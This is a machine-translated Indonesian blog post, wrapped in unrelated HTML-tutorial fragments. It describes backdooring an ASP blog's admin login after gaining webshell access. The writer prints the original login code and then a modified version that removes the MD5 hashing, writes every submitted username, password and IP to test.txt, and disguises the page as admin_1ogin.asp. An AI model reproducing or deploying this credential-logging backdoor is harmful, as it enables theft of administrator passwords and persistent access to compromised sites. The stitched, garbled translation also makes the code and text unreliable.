Direkomendasikan: Koleksi Penulisan Kode HTML HTML adalah bahasa markup hypertext (hypertextmarkuplanguage), juga dikenal sebagai bahasa web, diperlukan untuk memahaminya di halaman web. Meskipun ada banyak alat untuk membuat halaman web sekarang, seperti DreamWvear, FrontPage, dll., Anda benar -benar dapat membuat halaman web yang indah tanpa memahami kode -kode ini. . . Karena konten HTML banyak, beberapa orang bersedia menulis kode untuk membuat halaman web (efisiensi INE), dan kebanyakan dari mereka digunakan
Dalam pemeriksaan keamanan, saya benar -benar mendapatkan webshell, tetapi saya juga membutuhkan pekerja sosial untuk memiliki informasi lain di alamat emailnya, jadi saya harus tahu kebiasaannya.
Basis data diunduh, tetapi kata sandi MD5 tidak dapat didekripsi. Sayangnya, tampaknya Anda hanya perlu merekam kata sandi akun administrator loginnya!
Simpan kesulitan menghilangkan masalah!
Kata sandi ini sebenarnya penting tetapi tidak penting.
Karena banyak orang suka menggunakan kata sandi yang sama. Bahkan detektor keamanan seperti saya pasti kebiasaan menggunakan kata sandi akun yang sama.
Pertama, lihat kode login latar belakangnya
<%
Login redup
Setel login = adlogin baru
Login.Eksecute
Adlogin kelas
Excommcls pribadi
Private Sub Class_initialize
Setel commcls = Commoncls baru
Excommcls.isipallow
Excommcls.Checkinstall
Excommcls.getConfigCache (*)
Akhir sub
Sub Class_Terminate pribadi
Atur excommcls = tidak ada
Akhir sub
sub -eksekusi publik
Aksi redup
Tindakan = Permintaan (Tindakan)
Pilih Tindakan Kasus
Kasus checklogin
Login check
Loginout kasus
Loginout
Kasus lain
Loginf
Akhiri Pilih
Akhir sub
Sub -checklogin pribadi
Dim Adname, ADPWD, CheckCode
Adname = excommcls.g (trim (permintaan (adname)))
ADPWD = MD5 (trim (permintaan (ADPWD)))
CheckCode = excommcls.g (permintaan (centang)))
Jika trim (checkCode) <> sesi (bursa) dan aplikasi (sn & ischeckcode) = ya lalu
Excommcls.showmsg Kode verifikasi salah! , Aplikasi (SN & BlogUrl) & admin_login.asp
Keluar Sub
Akhiri jika
Jika trim (adname) = cstr (aplikasi (sn & adname)) dan trim (adpwd) = cstr (aplikasi (sn & adpwd)) lalu kemudian
Response.cookies (md5 (sn)) (adname) = adname
Response.cookies (md5 (sn)) (adpwd) = adpwd
sesi (adlogin) = md5 (sn)
Excommcls.getConfigCache (*)
Excommcls.getclasscache ()
Response.Redirect (Aplikasi (SN & BlogUrl) & Admin_index.asp)
Kalau tidak
Excommcls.showmsg Akun atau Kata Sandi salah, aplikasi (SN & BlogUrl) & admin_login.asp
Akhiri jika
Akhir sub
Sub Loginout Pribadi
Response.cookies (md5 (sn)) (adname) =
Response.cookies (md5 (sn)) (adpwd) =
session.abandon ()
Excommcls.showmsg berhasil keluar, aplikasi (sn & blogurl) & index.asp
Akhir sub
Sub Loginf Pribadi
%>
Lihat kode berikut
Adname = excommcls.g (trim (permintaan (adname)))
ADPWD = MD5 (trim (permintaan (ADPWD)))
--- Artinya sangat sederhana, jadi saya tidak menjelaskannya secara eksplisit di sini. Itu terutama tergantung pada MD5. Jika kata sandi dienkripsi menggunakan MD5, kata sandi yang kami rekam tidak akan berguna, dan masih MD5. Jadi
Jadi saya memikirkan metode penangkapan ikan. Antarmuka login aslinya adalah
Sub -checklogin pribadi
Dim Adname, ADPWD, CheckCode, StrlogText, IP, FF
Adname = excommcls.g (trim (permintaan (adname)))
ADPWD = (trim (permintaan (ADPWD)))
CheckCode = excommcls.g (permintaan (centang)))
strlogfile = test.txt
Ip = permintaan (ip)
StrlogText = strlogText & adname & ---- & adpwd & ----- ip: & ip & (remote_host)
Set F = Server.CreateObject (Scripting.FilesystemObject)
atur ff = f.opentextFile (server.mapath (.) &/& strlogfile, 8, true, 0)
FF.WriteLine (CHR (13)+CHR (10) & StrlogText)
ff.close
atur ff = tidak ada
atur f = tidak ada
Jika trim (checkCode) <> sesi (bursa) dan aplikasi (sn & ischeckcode) = ya lalu
Excommcls.showmsg Kode verifikasi salah! , Aplikasi (SN & BlogUrl) & admin_1ogin.asp
Keluar Sub
Akhiri jika
Jika trim (adname) = cstr (aplikasi (sn & adname)) dan trim (adpwd) = cstr (aplikasi (sn & adpwd)) lalu kemudian
Response.cookies (md5 (sn)) (adname) = adname
Response.cookies ((sn)) (ADPWD) = ADPWD
sesi (adlogin) = md5 (sn)
Excommcls.getConfigCache (*)
Excommcls.getclasscache ()
Response.Redirect (Aplikasi (SN & BlogUrl) & Admin_1ogin.asp)
Kalau tidak
Excommcls.showmsg akun atau kata sandi salah, aplikasi (SN & blogUrl) & admin_1ogin.asp
Akhiri jika
Akhir sub
Lihat atau tidak,
A = Halaman login asli sekarang telah diganti dengan halaman phishing
b = halaman login asli (admin_login.asp) dimodifikasi menjadi admin_1ogin.asp
Mengapa?
Asli: ADPWD = MD5 (trim (permintaan (ADPWD)))
Response.cookies (md5 (sn)) (adpwd) = adpwd
Merevisi
ADPWD = (trim (permintaan (ADPWD)))
Response.cookies ((sn)) (ADPWD) = ADPWD
Hapus MD5. . Metode membingungkan ini telah digunakan sejak lama! . .
Tidak ada konten teknis. Tolong jangan menertawakan saya! Kata sandi akan direkam di test.txt
Bagikan: Sorotan elemen kepala Dokumen HTML terdiri dari dua bagian: kepala (bagian tema, umumnya tidak terlihat) dan tubuh (bagian tubuh, terlihat di browser). Dengan popularitas editor web visual seperti FrontPage dan Dreamweaver (DW), itu bukan lagi mimpi untuk membuat halaman web profesional tanpa memahami HTML. Namun, alat pembuatan beranda ini tidak dapat digunakan